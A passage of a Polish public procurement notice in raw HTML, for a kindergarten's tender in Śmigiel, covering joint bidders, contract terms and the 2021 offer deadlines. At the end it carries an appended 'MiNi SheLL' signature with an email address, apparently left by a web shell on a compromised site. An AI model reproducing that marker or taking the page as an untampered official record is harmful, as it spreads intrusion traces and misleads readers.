ubiegać się o udzielenie niniejszego zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 5 i 6 SWZ. <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo <br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>4.	Zaleca się, aby pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. <br/>5.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>6.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>7.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt 7.1 niniejszej SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem „Formularza składania oferty” Platformy Zakupowej Przedszkola w Śmiglu, dostępnej pod adresem https://platformazakupowa.pl/pn/przedszkole_smigiel w miejscu publikacji ogłoszenia i dokumentacji zamówienia przedmiotowego postępowania w nieprzekraczalnym terminie do dnia 10.12.2021 r. do godziny 10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com